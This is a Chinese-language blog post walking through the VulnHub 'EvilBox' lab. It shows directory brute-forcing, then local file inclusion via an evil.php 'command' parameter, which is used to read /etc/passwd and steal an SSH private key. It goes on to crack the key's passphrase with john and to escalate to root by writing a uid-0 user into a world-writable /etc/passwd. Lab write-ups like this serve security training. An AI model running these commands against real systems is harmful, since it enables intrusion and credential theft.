freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

大余每日一攻防EvilBox
2023-12-27 15:26:40

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:
环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。
代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一、网络枚举

1703661861_658bd125a63d0913450a8.png!small?1703661861912
开启环境自动显示IP地址:192.168.0.199

1703661866_658bd12ae4fb34b296894.png!small?1703661868345
发现开启22、80端口信息。

二、Web信息枚举

1703661872_658bd130d70969c42de1c.png!small?1703661873597
web默认页面没什么信息,目录爆破看看:

gobuster dir -u http://192.168.0.199 -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z

1703661877_658bd135143392bc09473.png!small?1703661878082
利用gobuster工具扫描目标发现/secret以及/server-status目录,访问:

curl http://192.168.0.199/secret

1703661882_658bd13a14bf083036078.png!small?1703661882998
/secret目录有意思,访问该目录,发现返回是空白!
继续扫描:

gobuster dir -u http://192.168.0.199/secret/  -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z -x .php,.txt,.html

1703661886_658bd13e5543cb81a387d.png!small?1703661887830
发现了evil.php文件,访问该文件是空白的!

三、FUZZ模糊测试

模糊测试回显数据看看:

wfuzz -c -u 'http://192.168.0.199/secret/evil.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0

1703661890_658bd14257630f7fd3056.png!small?1703661891492
没有结果,修改test为/etc/passwd,继续FUZZ:

wfuzz -c -u 'http://192.168.0.199/secret/evil.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0

1703661894_658bd146de063bdeafb12.png!small?1703661896195
参数名称为command,验证:

curl http://192.168.0.199/secret/evil.php?command=../../../../../../etc/passwd

1703661899_658bd14bad629305b2050.png!small?1703661900872
存在LFI文件包含,读取到用户名信息。

四、文件包含

接下来利用php filter得到evil.php的源代码:

curl http://192.168.0.199/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

1703661904_658bd15034e9dd8ae3691.png!small?1703661904726

PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==

1703661908_658bd154757f5b3ce1c6c.png!small?1703661908929
得到了用户名,利用LFI漏洞(本地文件包含漏洞)查看是否有该用户的私钥:

curl http://192.168.0.199/secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa > id_rsa

1703661913_658bd1591535b00a37cfd.png!small?1703661914366
成功拿到该用户的私钥文件!!

五、ssh私钥爆破

赋权登录试试:

chmod 600 id_rsa
ssh -i id_rsa mowree@192.168.0.199

1703661917_658bd15d5d042d32f5c53.png!small?1703661918380
发现私钥需要密码,利用ssh2john.py爆破:

/usr/share/john/ssh2john.py id_rsa > 123
john 123 --wordlist /root/Desktop/rockyou.txt

1703661921_658bd1618c51b2dfa83cd.png!small?1703661922240
成功爆破获得密码!

ssh -i id_rsa mowree@192.168.0.199
unicorn

1703661925_658bd16568652bab5db63.png!small?1703661925852
成功利用爆破密码登录!

六、提权

信息枚举发现:
1703661929_658bd1693c858434ee740.png!small?1703661930125
/etc/passwd权限有问题!所有人都有可读可写权限,现在可以创建一个用户,并赋予root权限:

mkpasswd -m sha-512

1703661933_658bd16d99dacaeab7751.png!small?1703661934512
创建好秘钥信息!

dayu:$6$pieSVgJEnfARX707$x/OKUAH60PfdoRm2rkwTunCe0Oc7AiLaPwkKLe8rHqz4wyUoxUOUpllXYFnBKlsw4PS0HLPqe6O6l39nuwLtu/:0:0:root:/root:/bin/bash

1703661938_658bd172d588800ee1074.png!small?1703661940373
用vi写入添加即可!

1703661942_658bd176018bf78c49876.png!small?1703661942663
成功利用访问进入获得root权限!

代码审计也就一个文件包含include代码,其余的没什么可审计的,环境也比较简单学习了模糊测试。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!

扫描下方二维码添加小助手,进群和大余老师一起技术探讨交流吧!

1701847681_657022811043209291287.png!small?1701847682244

欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

1701847704_65702298ccb7a072cd4c7.png!small?1701847708052

本文作者:, 转载请注明来自FreeBuf.COM

# 漏洞 # 渗透测试 # 网络安全 # web安全 # CTF
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录